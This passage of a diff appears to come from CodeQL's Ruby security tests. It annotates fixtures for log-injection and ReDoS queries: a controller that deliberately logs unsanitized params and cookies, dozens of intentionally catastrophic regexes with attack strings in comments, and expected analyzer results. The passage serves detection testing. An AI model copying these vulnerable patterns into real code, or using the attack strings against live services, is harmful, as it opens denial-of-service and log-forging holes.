value | -| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:49:19:49:30 | ...[...] | app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref index 3368edec4023..19ed712f4586 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref +++ b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref @@ -1 +1,2 @@ -queries/security/cwe-117/LogInjection.ql \ No newline at end of file +query: queries/security/cwe-117/LogInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb index 67e0e1cb1a7c..a49cce26d47e 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb @@ -12,9 +12,9 @@ def init_logger def read_from_params init_logger - unsanitized = params[:foo] - @logger.debug unsanitized # BAD: unsanitized user input - @logger.error "input: " + unsanitized # BAD: unsanitized user input + unsanitized = params[:foo] # $ Source + @logger.debug unsanitized # BAD: unsanitized user input # $ Alert + @logger.error "input: " + unsanitized # BAD: unsanitized user input # $ Alert sanitized = unsanitized.gsub("\n", "") @logger.fatal sanitized # GOOD: sanitized user input @@ -22,17 +22,17 @@ def read_from_params unsanitized2 = unsanitized.sub("\n", "") @logger.info do - unsanitized2 # BAD: partially sanitized user input + unsanitized2 # BAD: partially sanitized user input # $ Alert end - @logger << "input: " + unsanitized2 # BAD: partially sanitized user input + @logger << "input: " + unsanitized2 # BAD: partially sanitized user input # $ Alert end def read_from_cookies init_logger - unsanitized = cookies[:bar] - @logger.add(Logger::INFO) { unsanitized } # BAD: unsanitized user input - @logger.log(Logger::WARN) { "input: " + unsanitized } # BAD: unsanitized user input + unsanitized = cookies[:bar] # $ Source + @logger.add(Logger::INFO) { unsanitized } # BAD: unsanitized user input # $ Alert + @logger.log(Logger::WARN) { "input: " + unsanitized } # BAD: unsanitized user input # $ Alert end def html_sanitization @@ -46,7 +46,7 @@ def html_sanitization def inspect_sanitization init_logger - @logger.debug params[:foo] # BAD: unsanitized user input + @logger.debug params[:foo] # BAD: unsanitized user input # $ Alert @logger.debug params[:foo].inspect # GOOD: sanitized user input end end diff --git a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref index 7f4557181d7c..12b806895875 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref @@ -1 +1,2 @@ -queries/security/cwe-1333/ReDoS.ql +query: queries/security/cwe-1333/ReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb index 450d330dc928..8f45aff3c454 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb @@ -1,7 +1,7 @@ # NOT GOOD; attack: "_" + "__".repeat(100) # Adapted from marked (https://github.com/markedjs/marked), which is licensed # under the MIT license; see file marked-LICENSE. -bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/ +bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/ # $ Alert # GOOD # Adapted from marked (https://github.com/markedjs/marked), which is licensed @@ -16,7 +16,7 @@ # NOT GOOD; attack: " '" + "\\\\".repeat(100) # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/ +bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/ # $ Alert # GOOD # Adapted from lulucms2 (https://github.com/yiifans/lulucms2). @@ -28,89 +28,89 @@ good3 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/ # NOT GOOD, variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) -bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/ +bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/ # $ Alert # NOT GOOD; attack: "/" + "\\/a".repeat(100) # Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), # which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. -bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/ +bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/ # $ Alert # NOT GOOD; attack: "##".repeat(100) + "\na" # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad6 = /^([\s\[\{\(]|#.*)*$/ +bad6 = /^([\s\[\{\(]|#.*)*$/ # $ Alert # GOOD good4 = /(\r\n|\r|\n)+/ # BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. -actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/ +actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/ # $ Alert # NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" # Adapted from Knockout (https://github.com/knockout/knockout), which is # licensed under the MIT license; see file knockout-LICENSE -bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i +bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i # $ Alert # GOOD good6 = /(a|.)*/ # Testing the NFA - only some of the below are detected. -bad7 = /^([a-z]+)+$/ -bad8 = /^([a-z]*)*$/ -bad9 = /^([a-zA-Z0-9])(([\\.-]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ -bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/ +bad7 = /^([a-z]+)+$/ # $ Alert +bad8 = /^([a-z]*)*$/ # $ Alert +bad9 = /^([a-zA-Z0-9])(([\\.-]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ # $ Alert +bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/ # $ Alert # NOT GOOD; attack: "[" + "][".repeat(100) + "]!" # Adapted from Prototype.js (https://github.com/prototypejs/prototype), which # is licensed under the MIT license; see file Prototype.js-LICENSE. -bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/ +bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/ # $ Alert # NOT GOOD; attack: "'" + "\\a".repeat(100) + '"' # Adapted from Prism (https://github.com/PrismJS/prism), which is licensed # under the MIT license; see file Prism-LICENSE. -bad12 = /("|')(\\?.)*?\1/ +bad12 = /("|')(\\?.)*?\1/ # $ Alert # NOT GOOD -bad13 = /(b|a?b)*c/ +bad13 = /(b|a?b)*c/ # $ Alert # NOT GOOD -bad15 = /(a|aa?)*b/ +bad15 = /(a|aa?)*b/ # $ Alert # GOOD good7 = /(.|\n)*!/ # NOT GOOD; attack: "\n".repeat(100) + "." -bad16 = /(.|\n)*!/m +bad16 = /(.|\n)*!/m # $ Alert # GOOD good8 = /([\w.]+)*/ # NOT GOOD -bad17 = Regexp.new '(a|aa?)*b' +bad17 = Regexp.new '(a|aa?)*b' # $ Alert # GOOD - not used as regexp good9 = '(a|aa?)*b' # NOT GOOD -bad18 = /(([\S\s]|[^a])*)"/ +bad18 = /(([\S\s]|[^a])*)"/ # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good10 = /([^"']+)*/ # NOT GOOD -bad20 = /((.|[^a])*)"/ +bad20 = /((.|[^a])*)"/ # $ Alert # GOOD good10 = /((a|[^a])*)"/ # NOT GOOD -bad21 = /((b|[^a])*)"/ +bad21 = /((b|[^a])*)"/ # $ Alert # NOT GOOD -bad22 = /((G|[^a])*)"/ +bad22 = /((G|[^a])*)"/ # $ Alert # NOT GOOD -bad23 = /(([0-9]|[^a])*)"/ +bad23 = /(([0-9]|[^a])*)"/ # $ Alert # BAD - missing result bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/ @@ -122,55 +122,55 @@ bad26 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/ # NOT GOOD -bad27 = /(([a-z]|[d-h])*)"/ +bad27 = /(([a-z]|[d-h])*)"/ # $ Alert # NOT GOOD -bad27 = /(([^a-z]|[^0-9])*)"/ +bad27 = /(([^a-z]|[^0-9])*)"/ # $ Alert # NOT GOOD -bad28 = /((\d|[0-9])*)"/ +bad28 = /((\d|[0-9])*)"/ # $ Alert # NOT GOOD -bad29 = /((\s|\s)*)"/ +bad29 = /((\s|\s)*)"/ # $ Alert # NOT GOOD -bad30 = /((\w|G)*)"/ +bad30 = /((\w|G)*)"/ # $ Alert # GOOD good11 = /((\s|\d)*)"/ # NOT GOOD -bad31 = /((\d|\w)*)"/ +bad31 = /((\d|\w)*)"/ # $ Alert # NOT GOOD -bad32 = /((\d|5)*)"/ +bad32 = /((\d|5)*)"/ # $ Alert # BAD - \f is not handled correctly -bad33 = /((\s|[\f])*)"/ +bad33 = /((\s|[\f])*)"/ # $ Alert # BAD - \v is not handled correctly -bad34 = /((\s|[\v]|\\v)*)"/ +bad34 = /((\s|[\v]|\\v)*)"/ # $ Alert # NOT GOOD -bad35 = /((\f|[\f])*)"/ +bad35 = /((\f|[\f])*)"/ # $ Alert # NOT GOOD -bad36 = /((\W|\D)*)"/ +bad36 = /((\W|\D)*)"/ # $ Alert # NOT GOOD -bad37 = /((\S|\w)*)"/ +bad37 = /((\S|\w)*)"/ # $ Alert # NOT GOOD -bad38 = /((\S|[\w])*)"/ +bad38 = /((\S|[\w])*)"/ # $ Alert # NOT GOOD -bad39 = /((1s|[\da-z])*)"/ +bad39 = /((1s|[\da-z])*)"/ # $ Alert # NOT GOOD -bad40 = /((0|[\d])*)"/ +bad40 = /((0|[\d])*)"/ # $ Alert # NOT GOOD -bad41 = /(([\d]+)*)"/ +bad41 = /(([\d]+)*)"/ # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good12 = /(\d+(X\d+)?)+/ @@ -182,49 +182,49 @@ good15 = /^([^>]+)*(>|$)/ # NOT GOOD -bad43 = /^([^>a]+)*(>|$)/ +bad43 = /^([^>a]+)*(>|$)/ # $ Alert # NOT GOOD -bad44 = /(\n\s*)+$/ +bad44 = /(\n\s*)+$/ # $ Alert # NOT GOOD -bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/ +bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/ # $ Alert # NOT GOOD -bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/ +bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/ # $ Alert # NOT GOOD -bad47 = /(a+|b+|c+)*c/ +bad47 = /(a+|b+|c+)*c/ # $ Alert # NOT GOOD -bad48 = /(((a+a?)*)+b+)/ +bad48 = /(((a+a?)*)+b+)/ # $ Alert # NOT GOOD -bad49 = /(a+)+bbbb/ +bad49 = /(a+)+bbbb/ # $ Alert # GOOD good16 = /(a+)+aaaaa*a+/ # NOT GOOD -bad50 = /(a+)+aaaaa$/ +bad50 = /(a+)+aaaaa$/ # $ Alert # GOOD good17 = /(\n+)+\n\n/ # NOT GOOD -bad51 = /(\n+)+\n\n$/ +bad51 = /(\n+)+\n\n$/ # $ Alert # NOT GOOD -bad52 = /([^X]+)*$/ +bad52 = /([^X]+)*$/ # $ Alert # NOT GOOD -bad53 = /(([^X]b)+)*$/ +bad53 = /(([^X]b)+)*$/ # $ Alert # GOOD good18 = /(([^X]b)+)*($|[^X]b)/ # NOT GOOD -bad54 = /(([^X]b)+)*($|[^X]c)/ +bad54 = /(([^X]b)+)*($|[^X]c)/ # $ Alert # GOOD good20 = /((ab)+)*ababab/ @@ -236,13 +236,13 @@ good22 = /((ab)+)*/ # NOT GOOD -bad55 = /((ab)+)*$/ +bad55 = /((ab)+)*$/ # $ Alert # GOOD good23 = /((ab)+)*[a1][b1][a2][b2][a3][b3]/ # NOT GOOD -bad56 = /([\n\s]+)*(.)/ +bad56 = /([\n\s]+)*(.)/ # $ Alert # GOOD - any witness passes through the accept state. good24 = /(A*A*X)*/ @@ -251,13 +251,13 @@ good26 = /([^\\\]]+)*/ # NOT GOOD -bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/ +bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/ # $ Alert # NOT GOOD -bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ +bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ # $ Alert # NOT GOOD -bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ +bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ # $ Alert # GOOD good27 = /(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-/ @@ -269,58 +269,58 @@ #good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ # NOT GOOD (but cannot currently construct a prefix) -bad62 = /a{2,3}(b+)+X/ +bad62 = /a{2,3}(b+)+X/ # $ Alert # NOT GOOD (and a good prefix test) -bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/ +bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/ # $ Alert # GOOD good30 = /(a+)*[\S\s][\S\s][\S\s]?/ # GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not parsing the range `[^]{2,3}`). -good31 = /(a+)*[\S\s]{2,3}/ +good31 = /(a+)*[\S\s]{2,3}/ # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[^]{2,}` when constructing the NFA). -good32 = /(a+)*([\S\s]{2,}|X)$/ +good32 = /(a+)*([\S\s]{2,}|X)$/ # $ Alert # GOOD good33 = /(a+)*([\S\s]*|X)$/ # NOT GOOD -bad64 = /((a+)*$|[\S\s]+)/ +bad64 = /((a+)*$|[\S\s]+)/ # $ Alert # GOOD - but still flagged. The only change compared to the above is the order of alternatives, which we don't model. -good34 = /([\S\s]+|(a+)*$)/ +good34 = /([\S\s]+|(a+)*$)/ # $ Alert # GOOD good35 = /((;|^)a+)+$/ # NOT GOOD (a good prefix test) -bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/ +bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/ # $ Alert # NOT GOOD -bad66 = /^ab(c+)+$/ +bad66 = /^ab(c+)+$/ # $ Alert # NOT GOOD -bad67 = /(\d(\s+)*){20}/ +bad67 = /(\d(\s+)*){20}/ # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. -good36 = /(([^\/]|X)+)(\/[\S\s]*)*$/ +good36 = /(([^\/]|X)+)(\/[\S\s]*)*$/ # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. -good37 = /^((x([^Y]+)?)*(Y|$))/ +good37 = /^((x([^Y]+)?)*(Y|$))/ # $ Alert # NOT GOOD -bad68 = /(a*)+b/ +bad68 = /(a*)+b/ # $ Alert # NOT GOOD -bad69 = /foo([\w-]*)+bar/ +bad69 = /foo([\w-]*)+bar/ # $ Alert # NOT GOOD -bad70 = /((ab)*)+c/ +bad70 = /((ab)*)+c/ # $ Alert # NOT GOOD -bad71 = /(a?a?)*b/ +bad71 = /(a?a?)*b/ # $ Alert # GOOD good38 = /(a?)*b/ @@ -329,54 +329,54 @@ bad72 = /(c?a?)*b/ # NOT GOOD -bad73 = /(?:a|a?)+b/ +bad73 = /(?:a|a?)+b/ # $ Alert # NOT GOOD - but not detected. bad74 = /(a?b?)*$/ # NOT GOOD -bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/ +bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/ # $ Alert # NOT GOOD - but not detected -bad77 = /^((a)+\w)+$/ +bad77 = /^((a)+\w)+$/ # $ Alert # NOT GOOD -bad78 = /^(b+.)+$/ +bad78 = /^(b+.)+$/ # $ Alert # GOOD good39 = /a*b/ # All 4 bad combinations of nested * and + -bad79 = /(a*)*b/ -bad80 = /(a+)*b/ -bad81 = /(a*)+b/ -bad82 = /(a+)+b/ +bad79 = /(a*)*b/ # $ Alert +bad80 = /(a+)*b/ # $ Alert +bad81 = /(a*)+b/ # $ Alert +bad82 = /(a+)+b/ # $ Alert # GOOD good40 = /(a|b)+/ good41 = /(?:[\s;,"'<>(){}|\[\]@=+*]|:(?![\/\\]))+/ # NOT GOOD -bad83 = /^((?:a{|-)|\w\{)+X$/ -bad84 = /^((?:a{0|-)|\w\{\d)+X$/ -bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/ -bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/ +bad83 = /^((?:a{|-)|\w\{)+X$/ # $ Alert +bad84 = /^((?:a{0|-)|\w\{\d)+X$/ # $ Alert +bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/ # $ Alert +bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/ # $ Alert # NOT GOOD bad87 = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/ # NOT GOOD -bad88 = /^X(\u0061|a)*Y$/ +bad88 = /^X(\u0061|a)*Y$/ # $ Alert # GOOD good43 = /^X(\u0061|b)+Y$/ # NOT GOOD -bad88 = /X([[:digit:]]|\d)+Y/ +bad88 = /X([[:digit:]]|\d)+Y/ # $ Alert # NOT GOOD -bad89 = /\G(a|\w)*$/ -bad90 = /\b(a|\w)*$/ +bad89 = /\G(a|\w)*$/ # $ Alert +bad90 = /\b(a|\w)*$/ # $ Alert # NOT GOOD; attack: "0".repeat(30) + "!" # Adapated from addressable (https://github.com/sporkmonger/addressable) @@ -387,5 +387,5 @@ module Bad91 var_char_class = ALPHA + DIGIT + '_' var_char = "(?:(?:[#{var_char_class}]|%[a-fA-F0-9][a-fA-F0-9])+)" var = "(?:#{var_char}(?:\\.?#{var_char})*)" - bad91 = /^#{var}$/ + bad91 = /^#{var}$/ # $ Alert end diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected index 79d6c72fa3f5..7d333ca4dbaa 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected @@ -1,3 +1,32 @@ +#select +| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:28:5:28:21 | call to gsub! | PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | +| PolynomialReDoS.rb:30:5:30:18 | call to slice! | PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | +| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | +| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | 